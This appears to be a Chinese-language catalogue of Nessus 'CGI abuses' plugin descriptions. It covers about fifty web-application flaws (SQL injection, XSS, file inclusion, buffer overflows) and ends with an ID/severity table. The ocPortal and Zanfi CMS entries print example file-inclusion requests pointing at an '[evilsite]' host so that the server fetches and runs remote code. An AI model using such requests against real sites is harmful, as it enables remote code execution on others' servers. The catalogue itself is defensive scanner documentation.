远程主机正在运行 ocPortal，这是一个以 PHP 编写的内容管理系统。

此软件的远程版本中存在一个错误，该错误可能允许攻击者通过使用文件“index.php”中的文件包含错误，在远程主机上执行任意命令。

攻击者可以通过以下请求执行任意命令：

  http://www.example.com/index.php?req_path=http://[evilsite]/

将使远程脚本包含远程站点上的文件“funcs.php”并执行该文件。

远程服务器运行的 bBlog 版本是以 PHP 编写并在 GPL 下发布的博客系统，其版本与版本 0.7.4 相同或更低。 

此软件的远程版本受到脚本“rss.php”中的 SQL 注入攻击的影响。此问题是应用程序未能正确审查用户提供的输入所致。 

攻击者可能会利用此缺陷在此主机上执行任意 PHP 代码或控制远程数据库。

远程主机运行 CactuShop，这是一个以 ASP 编写的 Web 应用程序。

此软件的远程版本容易遭受跨站脚本攻击，这是对用户在“popuplargeimage.asp”脚本中提供的数据缺少审查所致。

若成功利用此问题，攻击者便可在易受影响的服务器上执行恶意脚本代码。 

此版本也可能容易受到脚本“mailorder.asp”和“payonline.asp”中的 SQL 注入攻击。未过滤用户在“strItems”参数中提供的输入，便将其用于 SQL 查询。因此，可以通过畸形输入进行查询修改。

若成功利用此漏洞，攻击者便可在系统中执行命令（通过 MS SQL 函数 xp_cmdshell）。

远程主机正在运行 DUware 发布的一款产品，即 DUclassmate、DUclassified 或 DUforum。

此软件的远程版本中存在一个缺陷，该确诊允许攻击者通过向 /admin/、messages.asp 或 messagesDetails.asp 的参数提供畸形值在远程主机上执行任意 SQL 语句。

此外，DUclassified 在消息文本处理中包含一个跨站脚本漏洞。DUclassmate 的 account.asp 中包含一个未经授权的密码操纵问题。

远程主机正在运行 Zanfi CMS Lite，这是一个以 PHP 编写的内容管理系统。 

此软件的远程版本中存在一个错误，该错误可能允许攻击者通过使用文件“index.php”中的文件包含错误，在远程主机上执行任意命令。 

攻击者可以通过以下请求执行任意命令：

  http://www.example.com/index.php?inc=http://[evilsite]/commands

这将使远程脚本包含文件“commands.php”并执行改文件。

远程主机正在运行 GoSmart 消息板，这是一个以 ASP 编写的公告板管理器。

此软件的远程版本包含多个缺陷，这是应用程序未能正确审查用户提供的输入所致。

它还受到一个跨站脚本漏洞的影响。远程攻击者可利用此漏洞创建恶意链接，一旦不知情的用户访问该链接，便会在其浏览器中执行链接所包含的脚本代码。

此外，此版本容易受到 SQL 注入缺陷的影响，这些缺陷使攻击者可以注入任意 SQL 命令。

远程主机正在运行 BlackBoard Internet Newsboard System，这是一个基于 PHP 的开源 Internet 公告板软件应用程序。

此软件的远程版本容易受到 checkdb.inc.php 中一个远程文件包含缺陷的影响，这是对用户对“liapath”参数提供的数据缺少审查所致。

若成功利用此问题，攻击者便可在易受影响的服务器上执行恶意脚本代码。

*** Nessus 仅使用收集到的信息
*** 报告此漏洞。因此，
*** 这可能是一则误报。

根据其标题，远程版本的 WordPress 容易遭受 HTTP 拆分攻击，其中攻击者可插入 CR LF 字符，然后引诱没有防备的用户访问 URL。客户端将解析攻击者提供的辅助标头并可能对其进行操作。

CubeCart 的远程版本存在一个 SQL 注入问题，该问题允许攻击者通过向远程主机上的多个文件发送格式错误的值，在远程主机上执行任意 SQL 语句并可能覆盖远程系统上的任意文件。

远程主机正在运行 w-agora，这是一个以 PHP 编写的网上论坛应用程序。

此软件的远程版本容易遭受目录遍历攻击。远程攻击者可发送特别构建的 URL，使用 Web 服务器进程的特权读取远程系统上的任意文件。

远程服务器正在运行的 PHP 版本低于 5.0.2 或 4.39。

此软件的远程版本受到 PHP_Variables 中内存泄露漏洞的影响。攻击者可能会利用此缺陷远程读取远程主机上 httpd 进程的内存部分。

远程主机上安装的 PHP-Fusion 版本存在一个漏洞，该漏洞可能允许经过身份验证的攻击者注入任意 SQL 代码，这是未正确验证用户针对脚本“members.php”的“rowstart”参数和 “comments.php”脚本的“comment_id”参数提供的输入所致。

此外，该软件版本还包含多个跨站脚本问题，以及一个信息泄露漏洞；但是，Nessus 尚未针对这些问题进行测试。

远程主机正在运行 Silent-Storm，这是一款以 PHP 编写的基于 Web 的论坛管理软件。

此软件的远程版本中存在多个输入验证缺陷：

  - 存在一个与“index.php”脚本的“module”参数有关的跨站脚本漏洞。

  - 该应用程序未能审查“profile.php”脚本的“mail”参数，该参数可被滥用以将任意数据注入“users.dat”数据库文件，例如，获取应用程序的管理访问权限。

远程主机正在运行 w-agora，这是一个以 PHP 编写的基于 Web 的论坛管理软件。

此软件的远程版本中存在多个输入验证缺陷：

  - “redir_url.php”文件中存在一个 SQL 注入漏洞，该漏洞允许攻击者在远程数据库中执行任意 SQL 语句；

  - 存在一个跨站脚本问题，该问题允许攻击者通过向远程站点的合法用户发送畸形链接来窃取其 Cookie；

  - 存在一个 HTTP 响应拆分漏洞，该漏洞允许攻击者对远程主机执行跨站脚本攻击。

远程服务器运行某个版本的 Icecast，这是一款开源流音频服务器，其版本低于 1.3.12。

此版本受到一个远程缓冲区溢出漏洞的影响，这是因为它未正确检查客户端发送的数据边界。 

由于此漏洞，远程攻击者可以导致堆栈溢出，然后以服务器的特权执行任意代码。

*** Nessus 仅使用收集到的信息
*** 报告此漏洞。

远程服务器运行版本 1.3.10 或更低版本的 Icecast，这是一款开源流媒体音频服务器。

这些版本受到目录遍历缺陷的影响，这是因为应用程序未能正确审查用户提供的输入。

攻击者可以发送特别构建的 URL，以查看系统上的任意文件。

*** Nessus 仅使用收集到的信息
*** 报告此漏洞。

远程主机正在运行 Vignette Application Portal，这是一个商用门户套件。

此软件的远程版本中存在一个信息泄露漏洞。攻击者可请求诊断实用工具，这样可以通过请求 /portal/diag/ 泄露有关远程站点的信息。

远程版本的 Serendipity 容易受到 SQL 注入问题的影响，这是应用程序未能正确审查用户提供的输入所致。

攻击者可能会利用此缺陷在远程数据库中发出任意语句，从而绕过授权，甚至覆盖远程系统上的任意文件

此外，此 comment.php 脚本容易遭受跨站脚本攻击。

远程主机正在运行 MegaBBS，这是一款以 ASP 编写的基于 Web 的公告板系统。

此软件的远程版本容易遭受 SQL 注入攻击，这是对用户提供的输入缺少审查所致。攻击者可能会利用此缺陷在远程数据库中发出任意语句，从而绕过授权，甚至覆盖远程系统上的任意文件。

远程主机似乎正在运行 @lex guestbook，这是一款以 PHP 编写的留言簿 Web 应用程序。 

报告的版本可能允许远程攻击者在未经事先身份验证的情况下包含并执行恶意 PHP 脚本。通过修改“livre_include.php”脚本的“chem_absolu”参数，可在远程系统上执行任意 PHP 代码。

远程主机似乎正在运行 BroadBoard，这是一种用于管理基于 Web 的公告板系统的 ASP 脚本。

远程软件中存在一个缺陷，该缺陷允许远程攻击者注入任意 SQL 命令，从而可用于获取对远程主机的管理访问权限。

远程主机运行 Pinnacle ShowCenter 基于 Web 的界面。

此软件的远程版本容易遭受远程拒绝服务攻击，这是缺少皮肤参数健全性检查所致。

攻击者可利用特别构建的 URL 拒绝 ShowCenter 基于 Web 的界面的服务。

远程主机似乎正在运行 aspWebAlbum，这是一款 ASP 脚本，旨在附近在基于 Web 的应用程序中集成多个相册。

远程软件中存在一个缺陷，该缺陷允许任何人注入任意 SQL 命令，从而可用于获取对远程主机的管理访问权限。

远程主机似乎正在运行 aspWebCalendar，这是一款 ASP 脚本，旨在促进在基于 Web 的应用程序中集成多种日历。

远程软件中存在一个缺陷，该缺陷允许任何人注入任意 SQL 命令，从而可用于获取对远程主机的管理访问权限。

远程主机正在使用 YaBB 1 Gold Web 论坛软件。 

根据其版本号，此软件的远程版本容易受到多个输入验证问题的影响，这些问题可能允许攻击者对远程主机执行跨站脚本或 HTTP 拆分攻击。

远程主机正在运行 EmuLive Server4，这是一款 Web 和媒体流服务器。

管理界面中存在一个缺陷，该缺陷允许远程攻击者通过直接请求页面“/public/admin/index.htm”绕过身份验证程序。

攻击者可能会利用此缺陷获取远程服务的管理访问权限。

据报告，Emulive 在处理回车符时也存在拒绝服务情况，但 Nessus 尚未检查此问题。

远程主机正在运行 Tutos，这是一个以 PHP 编写的开源团队组织软件程序包。

根据其标题，此软件的远程版本容易受到多个输入验证缺陷的影响，这些缺陷允许经身份验证的用户对远程服务执行跨站脚本攻击、路径泄露攻击或 SQL 注入。

远程主机似乎正在使用 phpMyBackupPro。 

据报告，此软件的远程版本容易受到与用户输入验证有关的多个安全漏洞的影响。 

攻击者可能会利用这些问题获得应用程序的访问权限或访问底层数据库。

远程主机正在运行 BBS E-Mart Professional，这是一款以 PHP 编写的韩语电子商务应用程序。\n“/bemark/shop/index.php”的“filename”参数中存在一个目录遍历漏洞。远程攻击者可利用此漏洞读取有关系统的敏感信息。

根据其标题，vBulletin 的远程版本容易受到一个 SQL 注入问题的影响。据报告，3.0.0 至 3.0.3 版本容易出现此问题。攻击者可能会利用此缺陷获取远程数据库的控制权。

远程主机正在运行 Tutos，这是一个以 PHP 编写的开源团队组织软件程序包。

此软件的远程版本容易受到多个输入验证缺陷的影响，这些缺陷允许经身份验证的用户对远程服务执行跨站脚本攻击或 SQL 注入。

已安装“YaBB.pl”CGI。此版本受到一个跨站脚本漏洞的影响。此问题是应用程序未能正确审查用户提供的输入所致。

远程攻击者可利用此漏洞创建恶意链接，一旦不知情的用户访问该链接，便会在其浏览器中执行链接所包含的脚本代码。

YaBB 中的另一个缺陷可能允许攻击者通过将帖子中的畸形 IMG 标签发送到远程 YaBB 论坛并等待论坛管理员查看其中一封帖子，以在远程主机上执行恶意管理命令。

远程服务器正在运行的 PHP 版本低于 4.3.9 或 5.0.2。 

此软件的远程版本受到不明的文件上传漏洞的影响，可允许本地攻击者将任意文件上传到服务器。

** 仅可在本地利用此缺陷。

远程主机正在运行 PerlDesk，这是一个以 perl 编写的基于 Web 的帮助台和电子邮件管理应用程序。

此软件的远程版本存在一个文件包含问题，该问题可能允许攻击者读取远程主机上任意文件的片段并执行任意 perl 脚本，但前提是攻击者首先可以上传脚本。

根据其标题，远程 Web 服务器为 BEA WebLogic 版本 8.1 SP2 或更早版本。此类版本中存在多种漏洞，可能会允许远程主机上未经授权的访问或者获取远程 JSP 脚本的内容。

远程主机正在运行 Turbo Seek，这是一款搜索引擎和目录工具。

远程主机上运行的此软件版本存在一个漏洞，该漏洞允许远程攻击者读取远程系统的任意文件。

远程主机似乎正在运行更低版本的 OpenCA。 

据报告，OpenCA 0.9.1.6（含）及之前版本包含一个缺陷，该缺陷可导致攻击者绕过证书签名验证。

远程主机似乎正在运行更低版本的 OpenCA。 

据报告，OpenCA 0.9.1.3（含）及之前的版本包含多个缺陷，这些缺陷可能允许接受已撤销或过期的证书为有效证书。

目标正在运行一个以上的 Simple Form 实例，而这些实例无法从构造消息标头的变量中删除换行符。远程攻击者可利用此缺陷添加至收件人列表，将目标的 Simple Form 用作发送滥用邮件或垃圾邮件的代理。

目标正在运行至少一个 MailEnable 实例，该实例的 Professional Edition 和 Enterprise Edition 的 HTTPMail 服务 (MEHTTPS.exe) 中存在一个缺陷。可以通过发出超过 4045 个字符（如果日志记录已禁用，则 8500 个字符）的 HTTP 请求来利用此缺陷，这会导致基于堆的缓冲区溢出，进而导致 HTTPMail 服务崩溃并可能允许任意代码执行。

目标正在运行至少一个 MailEnable 实例，该实例的 Professional Edition 和 Enterprise Edition 的 HTTPMail 服务 (MEHTTPS.exe) 中存在一个缺陷。可以通过发出包含超过 100 个字符的 Content-Length 标头的 HTTP GET 来利用此缺陷，这会导致固定长度的缓冲区溢出，进而导致 HTTPMail 服务崩溃并可能允许任意代码执行。

远程主机正在运行一个 MailEnable 的实例，该实例的 Professional Edition 和 Enterprise Edition 的 HTTPMail 服务 (MEHTTPS.exe) 中存在一个缺陷。通过发出具有畸形授权标头的 HTTP 请求可利用此缺陷，这将导致空指针取消引用错误并导致 HTTPMail 服务崩溃。

目标正在运行至少一个版本为 0.6 或更低版本的 IlohaMail 实例。此类版本会在数据库信息未保存在会话表中时受到潜在密码泄露问题的影响。 

***** Nessus 只通过查看目标上
***** 安装的 IlohaMail 的版本号， 
***** 便确定目标上存在此漏洞。

目标正在运行至少一个版本为 0.8.6 的 IlohaMail 实例。此版本的拼写检查和 GnuPG 功能可能存在缺陷，这些缺陷允许经过身份验证的攻击者只需在拼写检查或发送消息时将其括在反引号中，便可以 Web 用户的特权运行任意命令。 

***** Nessus 只通过查看目标上
***** 安装的 IlohaMail 的版本号， 
***** 便确定目标上存在此漏洞。

目标正在运行至少一个版本为 0.7.9-RC2 或更低版本的 IlohaMail 实例。此类版本包含一个缺陷，该缺陷使经过身份验证的用户可以删除属于任何用户的联系人，但前提是使用基于数据库的后端存储联系人。出现此缺陷的原因是在删除 include/save_contacts.MySQL.inc 中的条目时未检查“delete_item”的所有权。 

***** Nessus 只通过查看目标上
***** 安装的 IlohaMail 的版本号， 
***** 便确定目标上存在此漏洞。

目标正在运行至少一个版本为 0.7.9-RC2 或更低版本的 IlohaMail 实例。此类版本未正确检查文件附件的上传路径，如果正在使用基于文件的后端，该缺陷便可允许攻击者将文件放在目标上的 Web 用户可写入的位置。 

***** Nessus 只通过查看目标上
***** 安装的 IlohaMail 的版本号， 
***** 便确定目标上存在此漏洞。

目标正在运行至少一个版本为 0.7.11 或更低版本的 IlohaMail 实例。此类版本在处理会话变量时包含一个缺陷，该缺陷允许未经身份验证的攻击者检索 Web 用户可用的任意文件，前提是文件系统后端正在使用当中。

目标正在运行至少一个版本为 0.7.10 或更低版本的 IlohaMail 实例。此类版本在处理语言变量时包含一个缺陷，该缺陷允许未经身份验证的攻击者检索 Web 用户可用的任意文件。

远程主机正在运行 IlohaMail，这是一个基于 PHP 的库存版本的 webmail 应用程序，无需数据库或单独的 IMAP 库。

远程主机正在运行 TorrentTrader，这是一款基于 Web 的 BitTorrent 跟踪程序。 

此软件的远程版本容易遭受 SQL 注入攻击，这可能允许攻击者在远程数据库中注入任意 SQL 语句。

ID	名称	严重性
15468	ocPortal index.php req_path 参数远程文件包含	high
15466	bBlog rss.php p 参数 SQL 注入	high
15461	CactuShop 5.x 多个远程漏洞（XSS、SQLi）	high
15453	DUware 产品多个远程漏洞（SQLi、XSS）	high
15452	Zanfi CMS Lite index.php inc 参数远程文件包含	high
15451	GoSmart Message Board 多个漏洞（SQLi、XSS）	high
15450	BlackBoard Internet Newsboard System checkdb.inc.php libpath 参数远程文件包含	high
15443	WordPress“wp-login.php”HTTP 响应拆分	medium
15442	CubeCart index.php cat_id 参数 SQL 注入	high
15437	w-Agora 多个脚本遍历任意文件访问	medium
15436	PHP php_variables.c 多种变量左方括号内存泄露	medium
15433	PHP-Fusion 4.01 多个漏洞	medium
15403	Silent-Storm Portal 多个输入验证漏洞	high
15402	w-Agora 4.1.6a 多个输入验证漏洞	high
15401	Icecast MP3 Client HTTP GET 请求远程溢出	high
15396	Icecast 编码遍历任意文件访问	medium
14847	Vignette 应用程序门户诊断实用工具信息泄露	medium
14842	Serendipity < 0.7.0beta3 多个漏洞	high
14837	PD9 MegaBBS 多个漏洞	high
14830	@lex Guestbook livre_include.php chem_absolu 参数远程文件包含	high
14828	BroadBoard 多个脚本 SQL 注入	high
14824	Pinnacle ShowCenter Skin DoS	medium
14817	aspWebAlbum Album.asp SQL 注入	medium
14816	aspWebCalendar calendar.asp SQL 注入	medium
14806	YaBB 1 Gold < 1.3.2 多个输入验证漏洞	medium
14805	Emulive Server4 身份验证绕过	high
14793	TUTOS < 1.1.20040412 多个输入验证问题	high
14787	phpMyBackupPro < 1.0.0 不明输入验证问题	high
14786	BBS E-Mark Professional index.php 文件名参数遍历任意文件访问	medium
14785	vBulletin authorize.php x_invoice_num 参数 SQL 注入	high
14784	TUTOS < 1.2 多个输入验证漏洞	high
14782	YaBB 1 GOLD SP 1.3.2 多个漏洞	low
14770	PHP rfc1867.c $_FILES 数组构建的 MIME 标头任意文件上传	low
14733	PerlDesk pdesk.cgi lang 参数遍历任意文件访问	medium
14722	WebLogic < 8.1 SP3 多种漏洞	high
14719	Turbo Seek tseekdir.cgi location 参数任意文件访问	medium
14715	OpenCA crypto-utils.lib libCheckSignature 函数签名验证漏洞	high
14714	OpenCA 多个签名验证绕过	high
14713	Simple Form 主题标签任意邮件中继	medium
14656	MailEnable Professional HTTPMail GET 请求远程溢出	medium
14655	MailEnable HTTPMail 服务内容长度标头溢出	critical
14654	MailEnable HTTPMail 服务授权标头处理远程 DoS	medium
14636	IlohaMail 不明数据库密码泄露漏洞	medium
14635	IlohaMail 多个外部程序任意命令执行	high
14633	IlohaMail 伪造的 GET/POST 任意联系人删除	medium
14632	IlohaMail 附件任意文件创建/覆盖	medium
14631	IlohaMail index.php session 参数任意文件访问	medium
14630	IlohaMail index.php init_lang 参数任意文件访问	medium
14629	IlohaMail 软件检测	info
14615	TorrentTrader download.php id 参数 SQL 注入	high

检测

Nessus 的 CGI abuses 系列

high

high

high

high

high

high

high

medium

high

medium

medium

medium

high

high

high

medium

medium

high

high

high

high

medium

medium

medium

medium

high

high

high

medium

high

high

low

low

medium

high

medium

high

high

medium

medium

critical

medium

medium

high

medium

medium

medium

medium

info

high